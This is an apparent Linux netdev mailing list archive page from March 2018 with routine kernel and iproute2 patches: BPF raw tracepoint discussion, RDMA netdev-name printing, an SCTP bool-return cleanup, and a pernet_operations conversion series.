> Patches 2 and 3 are minor cleanups to address allyesconfig build
> 
> Patch 4 refactor trace_iwlwifi_dev_ucode_error from 17 to 4 args
> 
> Patch 5 introduces COUNT_ARGS macro
> 
> Patch 6 minor prep work to expose number of arguments passed
> into tracepoints.
> 
> Patch 7 introduces BPF_RAW_TRACEPOINT api.
> the auto-cleanup and multiple concurrent users are must have
> features of tracing api. For bpf raw tracepoints it looks like:
>   // load bpf prog with BPF_PROG_TYPE_RAW_TRACEPOINT type
>   prog_fd = bpf_prog_load(...);
> 
>   // receive anon_inode fd for given bpf_raw_tracepoint
>   // and attach bpf program to it
>   raw_tp_fd = bpf_raw_tracepoint_open("xdp_exception", prog_fd);
> 
> Ctrl-C of tracing daemon or cmdline tool will automatically
> detach bpf program, unload it and unregister tracepoint probe.
> More details in patch 7.
> 
> Patch 8 - trivial support in libbpf
> Patches 9, 10 - user space tests
> 
> samples/bpf/test_overhead performance on 1 cpu:
> 
> tracepoint    base  kprobe+bpf tracepoint+bpf raw_tracepoint+bpf
> task_rename   1.1M   769K        947K            1.0M
> urandom_read  789K   697K        750K            755K

Applied to bpf-next, thanks Alexei!

^ permalink raw reply

* [PATCH iproute2-next 0/2] Print netdevice names and indexes for relevant RDMA devices
From: Leon Romanovsky @ 2018-03-26  8:28 UTC (permalink / raw)
  To: David Ahern; +Cc: Leon Romanovsky, netdev, RDMA mailing list, Stephen Hemminger

From: Leon Romanovsky <leonro@mellanox.com>

Hi,

This is user space part of the kernel patch [1], which exposed net
device name and index through RDMA netlink interface.

First patch is actually updates rdma_netlink.h to the latest kernel
variant, while second patch implements the print.

[1] https://patchwork.kernel.org/patch/10307339/

Leon Romanovsky (2):
  rdma: Update RDMA header file
  rdma: Print net device name and index for RDMA device

 rdma/include/uapi/rdma/rdma_netlink.h | 42 +++++++++++++++++++++++++++++++++++
 rdma/link.c                           | 21 ++++++++++++++++++
 rdma/utils.c                          |  2 ++
 3 files changed, 65 insertions(+)

^ permalink raw reply

* [PATCH iproute2-next 1/2] rdma: Update RDMA header file
From: Leon Romanovsky @ 2018-03-26  8:28 UTC (permalink / raw)
  To: David Ahern; +Cc: Leon Romanovsky, netdev, RDMA mailing list, Stephen Hemminger
In-Reply-To: <20180326082829.21214-1-leon@kernel.org>

From: Leon Romanovsky <leonro@mellanox.com>

Update RDMA netlink header file to kernel commit 29cf1351d450
("RDMA/nldev: provide detailed PD information")

Signed-off-by: Leon Romanovsky <leonro@mellanox.com>
---
 rdma/include/uapi/rdma/rdma_netlink.h | 38 +++++++++++++++++++++++++++++++++++
 1 file changed, 38 insertions(+)

diff --git a/rdma/include/uapi/rdma/rdma_netlink.h b/rdma/include/uapi/rdma/rdma_netlink.h
index dbac3b82..9446a721 100644
--- a/rdma/include/uapi/rdma/rdma_netlink.h
+++ b/rdma/include/uapi/rdma/rdma_netlink.h
@@ -238,6 +238,14 @@ enum rdma_nldev_command {

 	RDMA_NLDEV_CMD_RES_QP_GET, /* can dump */

+	RDMA_NLDEV_CMD_RES_CM_ID_GET, /* can dump */
+
+	RDMA_NLDEV_CMD_RES_CQ_GET, /* can dump */
+
+	RDMA_NLDEV_CMD_RES_MR_GET, /* can dump */
+
+	RDMA_NLDEV_CMD_RES_PD_GET, /* can dump */
+
 	RDMA_NLDEV_NUM_OPS
 };

@@ -350,6 +358,36 @@ enum rdma_nldev_attr {
 	 */
 	RDMA_NLDEV_ATTR_RES_KERN_NAME,		/* string */

+	RDMA_NLDEV_ATTR_RES_CM_ID,		/* nested table */
+	RDMA_NLDEV_ATTR_RES_CM_ID_ENTRY,	/* nested table */
+	/*
+	 * rdma_cm_id port space.
+	 */
+	RDMA_NLDEV_ATTR_RES_PS,			/* u32 */
+	/*
+	 * Source and destination socket addresses
+	 */
+	RDMA_NLDEV_ATTR_RES_SRC_ADDR,		/* __kernel_sockaddr_storage */
+	RDMA_NLDEV_ATTR_RES_DST_ADDR,		/* __kernel_sockaddr_storage */
+
+	RDMA_NLDEV_ATTR_RES_CQ,			/* nested table */
+	RDMA_NLDEV_ATTR_RES_CQ_ENTRY,		/* nested table */
+	RDMA_NLDEV_ATTR_RES_CQE,		/* u32 */
+	RDMA_NLDEV_ATTR_RES_USECNT,		/* u64 */
+	RDMA_NLDEV_ATTR_RES_POLL_CTX,		/* u8 */
+
+	RDMA_NLDEV_ATTR_RES_MR,			/* nested table */
+	RDMA_NLDEV_ATTR_RES_MR_ENTRY,		/* nested table */
+	RDMA_NLDEV_ATTR_RES_RKEY,		/* u32 */
+	RDMA_NLDEV_ATTR_RES_LKEY,		/* u32 */
+	RDMA_NLDEV_ATTR_RES_IOVA,		/* u64 */
+	RDMA_NLDEV_ATTR_RES_MRLEN,		/* u64 */
+
+	RDMA_NLDEV_ATTR_RES_PD,			/* nested table */
+	RDMA_NLDEV_ATTR_RES_PD_ENTRY,		/* nested table */
+	RDMA_NLDEV_ATTR_RES_LOCAL_DMA_LKEY,	/* u32 */
+	RDMA_NLDEV_ATTR_RES_UNSAFE_GLOBAL_RKEY,	/* u32 */
+
 	RDMA_NLDEV_ATTR_MAX
 };
 #endif /* _RDMA_NETLINK_H */

^ permalink raw reply related

* [PATCH iproute2-next 2/2] rdma: Print net device name and index for RDMA device
From: Leon Romanovsky @ 2018-03-26  8:28 UTC (permalink / raw)
  To: David Ahern; +Cc: Leon Romanovsky, netdev, RDMA mailing list, Stephen Hemminger
In-Reply-To: <20180326082829.21214-1-leon@kernel.org>

From: Leon Romanovsky <leonro@mellanox.com>

The RDMA devices are operated in RoCE and iWARP modes have net device
underneath. Present their names in regular output and their net index
in detailed mode.

[root@nps ~]# rdma link show mlx5_3/1
4/1: mlx5_3/1: state ACTIVE physical_state LINK_UP netdev ens7
[root@nps ~]# rdma link show mlx5_3/1 -d
4/1: mlx5_3/1: state ACTIVE physical_state LINK_UP netdev ens7 netdev_index 7
    caps: <CM, IP_BASED_GIDS>

Signed-off-by: Leon Romanovsky <leonro@mellanox.com>
---
 rdma/include/uapi/rdma/rdma_netlink.h |  4 ++++
 rdma/link.c                           | 21 +++++++++++++++++++++
 rdma/utils.c                          |  2 ++
 3 files changed, 27 insertions(+)

diff --git a/rdma/include/uapi/rdma/rdma_netlink.h b/rdma/include/uapi/rdma/rdma_netlink.h
index 9446a721..45474f13 100644
--- a/rdma/include/uapi/rdma/rdma_netlink.h
+++ b/rdma/include/uapi/rdma/rdma_netlink.h
@@ -388,6 +388,10 @@ enum rdma_nldev_attr {
 	RDMA_NLDEV_ATTR_RES_LOCAL_DMA_LKEY,	/* u32 */
 	RDMA_NLDEV_ATTR_RES_UNSAFE_GLOBAL_RKEY,	/* u32 */

+	/* Netdev information for relevant protocols, like RoCE and iWARP */
+	RDMA_NLDEV_ATTR_NDEV_INDEX,		/* u32 */
+	RDMA_NLDEV_ATTR_NDEV_NAME,		/* string */
+
 	RDMA_NLDEV_ATTR_MAX
 };
 #endif /* _RDMA_NETLINK_H */
diff --git a/rdma/link.c b/rdma/link.c
index 66bcd50e..7e914c87 100644
--- a/rdma/link.c
+++ b/rdma/link.c
@@ -205,6 +205,26 @@ static void link_print_phys_state(struct rd *rd, struct nlattr **tb)
 		pr_out("physical_state %s ", phys_state_to_str(phys_state));
 }

+static void link_print_netdev(struct rd *rd, struct nlattr **tb)
+{
+	const char *netdev_name;
+	uint32_t idx;
+
+	if (!tb[RDMA_NLDEV_ATTR_NDEV_NAME] || !tb[RDMA_NLDEV_ATTR_NDEV_INDEX])
+		return;
+
+	netdev_name = mnl_attr_get_str(tb[RDMA_NLDEV_ATTR_NDEV_NAME]);
+	idx = mnl_attr_get_u32(tb[RDMA_NLDEV_ATTR_NDEV_INDEX]);
+	if (rd->json_output) {
+		jsonw_string_field(rd->jw, "netdev", netdev_name);
+		jsonw_uint_field(rd->jw, "netdev_index", idx);
+	} else {
+		pr_out("netdev %s ", netdev_name);
+		if (rd->show_details)
+			pr_out("netdev_index %u ", idx);
+	}
+}
+
 static int link_parse_cb(const struct nlmsghdr *nlh, void *data)
 {
 	struct nlattr *tb[RDMA_NLDEV_ATTR_MAX] = {};
@@ -241,6 +261,7 @@ static int link_parse_cb(const struct nlmsghdr *nlh, void *data)
 	link_print_lmc(rd, tb);
 	link_print_state(rd, tb);
 	link_print_phys_state(rd, tb);
+	link_print_netdev(rd, tb);
 	if (rd->show_details)
 		link_print_caps(rd, tb);

diff --git a/rdma/utils.c b/rdma/utils.c
index f9460162..4fed80ab 100644
--- a/rdma/utils.c
+++ b/rdma/utils.c
@@ -375,6 +375,8 @@ static const enum mnl_attr_data_type nldev_policy[RDMA_NLDEV_ATTR_MAX] = {
 	[RDMA_NLDEV_ATTR_RES_STATE]		= MNL_TYPE_U8,
 	[RDMA_NLDEV_ATTR_RES_PID]		= MNL_TYPE_U32,
 	[RDMA_NLDEV_ATTR_RES_KERN_NAME]	= MNL_TYPE_NUL_STRING,
+	[RDMA_NLDEV_ATTR_NDEV_INDEX]		= MNL_TYPE_U32,
+	[RDMA_NLDEV_ATTR_NDEV_NAME]		= MNL_TYPE_NUL_STRING,
 };

 int rd_attr_cb(const struct nlattr *attr, void *data)

^ permalink raw reply related

* [PATCH net] sctp: remove unnecessary asoc in sctp_has_association
From: Xin Long @ 2018-03-26  8:55 UTC (permalink / raw)
  To: network dev, linux-sctp; +Cc: davem, Marcelo Ricardo Leitner, Neil Horman

After Commit dae399d7fdee ("sctp: hold transport instead of assoc
when lookup assoc in rx path"), it put transport instead of asoc
in sctp_has_association. Variable 'asoc' is not used any more.

So this patch is to remove it, while at it,  it also changes the
return type of sctp_has_association to bool, and does the same
for it's caller sctp_endpoint_is_peeled_off.

Signed-off-by: Xin Long <lucien.xin@gmail.com>
---
 include/net/sctp/structs.h |  8 ++++----
 net/sctp/endpointola.c     |  8 ++++----
 net/sctp/input.c           | 13 ++++++-------
 3 files changed, 14 insertions(+), 15 deletions(-)

diff --git a/include/net/sctp/structs.h b/include/net/sctp/structs.h
index 03e92dd..13e644d 100644
--- a/include/net/sctp/structs.h
+++ b/include/net/sctp/structs.h
@@ -1337,12 +1337,12 @@ struct sctp_association *sctp_endpoint_lookup_assoc(
 	const struct sctp_endpoint *ep,
 	const union sctp_addr *paddr,
 	struct sctp_transport **);
-int sctp_endpoint_is_peeled_off(struct sctp_endpoint *,
-				const union sctp_addr *);
+bool sctp_endpoint_is_peeled_off(struct sctp_endpoint *ep,
+				 const union sctp_addr *paddr);
 struct sctp_endpoint *sctp_endpoint_is_match(struct sctp_endpoint *,
 					struct net *, const union sctp_addr *);
-int sctp_has_association(struct net *net, const union sctp_addr *laddr,
-			 const union sctp_addr *paddr);
+bool sctp_has_association(struct net *net, const union sctp_addr *laddr,
+			  const union sctp_addr *paddr);
 
 int sctp_verify_init(struct net *net, const struct sctp_endpoint *ep,
 		     const struct sctp_association *asoc,
diff --git a/net/sctp/endpointola.c b/net/sctp/endpointola.c
index 8b31468..e2f5a3e 100644
--- a/net/sctp/endpointola.c
+++ b/net/sctp/endpointola.c
@@ -349,8 +349,8 @@ struct sctp_association *sctp_endpoint_lookup_assoc(
 /* Look for any peeled off association from the endpoint that matches the
  * given peer address.
  */
-int sctp_endpoint_is_peeled_off(struct sctp_endpoint *ep,
-				const union sctp_addr *paddr)
+bool sctp_endpoint_is_peeled_off(struct sctp_endpoint *ep,
+				 const union sctp_addr *paddr)
 {
 	struct sctp_sockaddr_entry *addr;
 	struct sctp_bind_addr *bp;
@@ -362,10 +362,10 @@ int sctp_endpoint_is_peeled_off(struct sctp_endpoint *ep,
 	 */
 	list_for_each_entry(addr, &bp->address_list, list) {
 		if (sctp_has_association(net, &addr->a, paddr))
-			return 1;
+			return true;
 	}
 
-	return 0;
+	return false;
 }
 
 /* Do delayed input processing.  This is scheduled by sctp_rcv().
diff --git a/net/sctp/input.c b/net/sctp/input.c
index b381d78..ba8a6e6 100644
--- a/net/sctp/input.c
+++ b/net/sctp/input.c
@@ -1010,19 +1010,18 @@ struct sctp_association *sctp_lookup_association(struct net *net,
 }
 
 /* Is there an association matching the given local and peer addresses? */
-int sctp_has_association(struct net *net,
-			 const union sctp_addr *laddr,
-			 const union sctp_addr *paddr)
+bool sctp_has_association(struct net *net,
+			  const union sctp_addr *laddr,
+			  const union sctp_addr *paddr)
 {
-	struct sctp_association *asoc;
 	struct sctp_transport *transport;
 
-	if ((asoc = sctp_lookup_association(net, laddr, paddr, &transport))) {
+	if (sctp_lookup_association(net, laddr, paddr, &transport)) {
 		sctp_transport_put(transport);
-		return 1;
+		return true;
 	}
 
-	return 0;
+	return false;
 }
 
 /*
-- 
2.1.0

^ permalink raw reply related

* [PATCH net-next v1 0/4] Converting pernet_operations (part #7.1)
From: Kirill Tkhai @ 2018-03-26  9:28 UTC (permalink / raw)
  To: davem, anna.schumaker, trond.myklebust, ktkhai, netdev

Hi,

this is a resending of the 4 patches from path #7.

Anna kindly reviewed them and suggested to take the patches
through net tree, since there is pernet_operations::async only
in net-next.git.

There is Anna's acks on every header, the rest of patch
has no changes.

Thanks,
Kirill
---

Kirill Tkhai (4):
      net: Convert rpcsec_gss_net_ops
      net: Convert sunrpc_net_ops
      net: Convert nfs4_dns_resolver_ops
      net: Convert nfs4blocklayout_net_ops


 fs/nfs/blocklayout/rpc_pipefs.c |    1 +
 fs/nfs/dns_resolve.c            |    1 +
 net/sunrpc/auth_gss/auth_gss.c  |    1 +
 net/sunrpc/sunrpc_syms.c        |    1 +
 4 files changed, 4 insertions(+)

^ permalink raw reply


This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox